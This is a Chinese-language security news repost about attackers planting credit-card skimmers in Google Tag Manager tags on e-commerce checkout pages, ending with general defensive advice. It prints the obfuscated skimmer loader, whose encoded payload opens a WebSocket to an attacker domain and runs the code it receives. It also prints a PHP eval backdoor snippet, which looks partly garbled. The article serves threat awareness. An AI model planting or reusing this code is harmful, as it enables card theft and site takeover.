更多全球网络安全资讯尽在邑安全
恶意软件攻击
攻击者将恶意代码嵌入GTM标签中,这些标签乍一看似乎是合法的。然而,经过仔细检查,发现这些脚本会收集用户在结账过程中输入的敏感数据,并将其发送到攻击者控制的远程服务器。恶意代码通常伪装成标准的GTM和Google Analytics跟踪脚本,但其中包含充当信用卡盗取器的编码JavaScript有效负载。例如:
(function(i, s, h, k, l, o, c, m) {m['GoogleAnalyticsObjects'] = o;c = s.createElement(h), i = s.getElementsByTagName(h)[0];if (l.href.match(new RegExp(atob(o)))) {c.async = 1;c.src = new Function(atob(k)).call(this);}})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2V1cm93ZWJtb25pdG9ydG9vbC5jb20vY29tbW9uP3NvdXJjZT0nKSArIGVuY29kZVVSSUNvbXBvbmVudChsb2NhdGlvbi5ocmVmKSk7d2luZG93Lnd3Lm9ubWVzc2FnZT1mdW5jdGlvbihlKXtldmFsKGUuZGF0YSk7fQ==', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);
后门代码示例:
function get_data($param, $default) {$total = $_REQUEST;if(isset($total[$param])) {return $total[$param];} else {return $default;}}function get_cli() {if( strpos(hash("sha256", get_data("item", "")), "5a2c75360f3ff123") === false )return "";$param_name = "order";$data = get_data($param_name, "");$cli = get_cli();return eval($cli);}
防护建议为防止此类攻击,网站管理员应定期监控GTM标签,确保所有标签均合法且由授权人员放置。他们应进行彻底审计,检查是否存在可疑脚本和后门,使用网站防火墙和恶意软件检测系统等安全工具,并通过确保所有插件和平台保持最新状态来及时更新软件。
原文来自: cybersecuritynews.com
原文链接: https://cybersecuritynews.com/hackers-exploiting-google-tag-manager/
原文始发于微信公众号(邑安全):黑客利用Google Tag Manager窃取电商网站信用卡信息
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论